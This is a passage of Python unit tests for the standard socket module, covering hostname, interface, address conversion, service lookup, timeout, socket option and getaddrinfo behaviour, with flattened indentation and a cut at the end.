@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_indextoname'),
'socket.if_indextoname() not available.')
def testInvalidInterfaceIndexToName(self):
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(socket, 'if_nametoindex'),
'socket.if_nametoindex() not available.')
def testInvalidInterfaceNameToIndex(self):
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = (
l_bad_values +
[_testcapi.INT_MIN-1, _testcapi.INT_MAX+1] +
[1 << 16, _testcapi.INT_MAX]
)
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption-breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as s:
self.assertEqual(s.gettimeout(), None)
# Set the default timeout to 10, and see if it propagates
with socket_setdefaulttimeout(10):
self.assertEqual(socket.getdefaulttimeout(), 10)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), 10)
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), None)
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = socket_helper.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it is reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# A freshly created socket should start with SO_REUSEADDR unset (reuse == 0)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.settimeout(1)
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = socket_helper.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = socket_helper.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if socket_helper.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(repr(family), '<AddressFamily.AF_INET: %r>' % family.value)
self.assertEqual(str(family), str(family.value))
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(repr(type), '<SocketKind.SOCK_STREAM: %r>' % type.value)
self.assertEqual(str(type), str(type.value))
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care about here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with socket_helper.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(TimeoutError, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
encoding = None if "b" in mode else "utf-8"
with sock.makefile(mode, encoding=encoding) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(socket_helper.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (socket_helper.HOSTv6, 0, -10))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
@unittest.skipUnless(hasattr(socket, 'if_nameindex'), "test needs socket.if_nameindex()")
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
    @unittest.skipUnless(
        sys.platform == 'win32',
        'Numeric scope id does not work or is undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
        # Windows, Linux and Mac OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
@unittest.skipUnless(hasattr(socket, 'if_nameindex'), "test needs socket.if_nameindex()")
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
    @unittest.skipUnless(
        sys.platform == 'win32',
        'Numeric scope id does not work or is undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(repr(s.family), '<AddressFamily.AF_INET: %r>' % s.family.value)
self.assertEqual(repr(s.type), '<SocketKind.SOCK_STREAM: %r>' % s.type.value)
self.assertEqual(str(s.family), str(s.family.value))
self.assertEqual(str(s.type), str(s.type.value))
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
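        # On platforms that support them, SOCK_NONBLOCK / SOCK_CLOEXEC may be
        # ORed into the type at creation time; socket.type should report only
        # the base kind (SOCK_STREAM), and toggling timeouts or blocking mode
        # below must not leak those creation-time flags back into it.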
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
        # To do this we fool socket.socket into believing it already has an
        # open fd: on that code path it skips verifying the family and type
        # and simply populates the socket object with the values given.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd = sock.detach()
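        # detach() transfers ownership of the fd to us; the original socket
        # object is now closed as far as Python is concerned and must not be
        # used again.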
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
            # some OSes, such as macOS, ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
